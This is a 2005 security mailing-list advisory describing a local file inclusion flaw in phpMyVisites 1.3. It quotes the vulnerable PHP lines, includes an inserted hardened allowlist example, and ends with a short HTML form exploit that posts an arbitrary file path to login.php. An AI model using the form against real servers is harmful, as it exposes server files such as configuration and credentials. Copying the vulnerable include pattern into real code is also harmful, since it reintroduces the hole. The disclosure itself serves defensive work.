[exploits] phpMyVisites 1.3 local file retrieval

From: Max Cerny (max_at_czerny.cz)
Date: 04/26/05

    Date: 26 Apr 2005 19:35:00 -0000
    To: bugtraq@securityfocus.com

    ==================================================================
    File: phpMyVisites 1.3 local file retrieval
    From: remote
    Date: 26/04/2005
    Credits: Max Cerny (max[at]czerny[dot]cz)
    Vendor: http://www.phpmyvisites.net
    Affected version: 1.3 (later versions not tested)
    ==================================================================

    ==================================================================
    Description:
     A remote user can retrieve arbitrary local files from the web server
    phpMyVisites is running on. The cause is missing validation of
    user-supplied data before it is used in a file include.

    FILE: include/set_lang.php

    line 94:
     include "./langs/".$lang['default_lang'];

    where $lang['default_lang'] is set from a cookie on line 66:
     $lang['default_lang'] = $_COOKIE[$nomcookielg];

    and that cookie is itself filled from unvalidated POST data on
    line 40:
     setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);

    So the value of $_POST['mylang'] can be set to the path of any file,
    and that file is then included by the script.
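    The following is an added example of how the language selection in
    set_lang.php could be hardened; it is not phpMyVisites code and the
    cookie name, directory layout and file names are assumptions. The point
    it demonstrates is that the cookie is attacker-controlled no matter how
    it was written, so the value must be checked against an allowlist of
    real language files at the moment it is used in the include, not only
    when it is stored.

```php
<?php
// Added example, not phpMyVisites code. Assumes language files live in
// ./langs/ and are named like "en.php" / "fr.php"; the cookie name is a
// placeholder, not the project's real one.
$nomcookielg = 'phpmv_lang';
$langs_dir   = __DIR__ . '/langs';

// Build the allowlist from the files actually present in the directory,
// so only a known language file can ever be selected.
function allowed_langs($dir) {
    $list = array();
    foreach (glob($dir . '/*.php') as $path) {
        $list[] = basename($path);
    }
    return $list;
}

// Return the candidate only if it is exactly one of the allowed file
// names; "../", absolute paths, null bytes or anything else fall back to
// the default. Strict comparison avoids type-juggling surprises.
function pick_lang($candidate, $allowed, $default = 'en.php') {
    if (is_string($candidate) && in_array($candidate, $allowed, true)) {
        return $candidate;
    }
    return $default;
}

$allowed = allowed_langs($langs_dir);

// Counterpart of line 40: store only a validated value in the cookie.
if (isset($_POST['mylang'])) {
    $chosen = pick_lang($_POST['mylang'], $allowed);
    setcookie($nomcookielg, $chosen, time() + 3600 * 24 * 365 * 10);
    $_COOKIE[$nomcookielg] = $chosen;
}

// Counterpart of lines 66 and 94: validate again at the point of use,
// because a client can send any cookie value regardless of what the
// server wrote earlier.
$cookie_lang = isset($_COOKIE[$nomcookielg]) ? $_COOKIE[$nomcookielg] : '';
$lang['default_lang'] = pick_lang($cookie_lang, $allowed);
include $langs_dir . '/' . $lang['default_lang'];
```

    Checking at the include itself is what closes the bug; validating only
    in the POST handler would leave the cookie path open to a client that
    sets the cookie directly.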

    ==================================================================

    ==================================================================
    Exploit:
     <form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
     Local file: <input type="text" name="mylang" value="" />
     <input type="submit" value="Alexx says RELAX!">
     </form>

    ==================================================================

    ==================================================================
    Fix:
     Contact the Vendor

    ==================================================================
                            Have a nice Day !
    ==================================================================

